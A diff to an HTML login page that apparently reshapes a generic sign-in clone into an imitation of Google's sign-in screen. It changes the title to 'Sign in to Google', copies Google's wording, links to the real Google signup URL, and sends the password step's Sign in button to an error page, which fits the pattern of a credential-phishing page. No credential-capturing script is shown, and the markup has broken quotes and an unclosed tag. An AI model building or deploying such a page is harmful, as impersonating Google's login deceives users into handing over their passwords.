--- a/index.html
+++ b/index.html
@@ -1,13 +1,16 @@
 <!DOCTYPE html>
-<html lang="en">
+<html id=“product-sans” lang="en">
 <head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    
     <meta http-equiv="X-UA-Compatible" content="ie=edge">
-    <title>Document</title>
+    <title>Sign in to Google</title>
     <link rel="stylesheet" href="assets/css/style.css">
+    <link rel=“stylesheet” href=“assets/css/font.css”>
     <script src="assets/js/jquery-3.3.1.js"></script>
     <script src="assets/js/script.js"></script>
+    
 </head>
 <body>
     <div class="main">
@@ -21,12 +24,12 @@
         </div>
         <!-- after signin -->
         <div id="loader-2">
-            <div class="three-balls">
+            <div onload=“” class="three-balls">
                 <div class="ball ball1"></div>
                 <div class="ball ball2"></div>
                 <div class="ball ball3"></div>
             </div>
-            <div class="loader-2-text">Signing you in...</div>
+
         </div>
         <!-- another loader -->
         <!-- loaders end -->
@@ -38,21 +41,19 @@
             </div>
             <div class="menu-items">
                 <ul>
-                    <li id="about">About</li>
-                    <li id="overlay-btn">Overlay</li>
-                    <li>Instagram</li>
+                    <li>About</li>
+                    <li>Privacy Policy</li>
                     <li>Contact</li>
-                    <li>etc...</li>
                 </ul>
             </div>
         </div>
 
         <div class="logo">
-            <img src="assets/img/logo.png" alt="logo" class="logo-img">
+            <img src="assets/img/logo.png" height=50 alt="logo" class="logo-img">
         </div>
         <h1 class="heading">
             <div class="h_main">Sign in</div>
-            <div class="h_sub">with your Google Account</div>
+            <div class="h_sub">Use your Google Account</div>
         </h1>
         <div class="tag-wrapper">
             <div class="user-tag">
@@ -76,7 +77,7 @@
                     Not your computer? Use Guest mode to sign in privately.
                 </div>
                 <div class="create-next">
-                    <span>Create account</span>
+                    <a href=“https://accounts.google.com/signup/v2/webcreateaccount?continue=https%3A%2F%2Faccounts.google.com%2F&gmb=exp&biz=false&flowName=GlifWebSignIn&flowEntry=SignUp”><span>Create account</span></a>
                     <button class="btn" id="next" type="submit" name="email_submit" disabled>Next</button>
                 </div>
             </div>
@@ -92,7 +93,7 @@
                 <span class="forgot">Forgot password?</span>
                 <div class="create-next">
                     <div class="go-back"> <img src="assets/img/go-back-left-arrow.svg" alt=""> Go back</div>
-                    <button class="btn" id="sign-in" type="submit" name="password_submit" disabled>Sign in</button>
+                    <a href=error.html><button class="btn" id="sign-in" type="submit" name="password_submit" disabled>Sign in</button><a>
                 </div>
             </div>
 
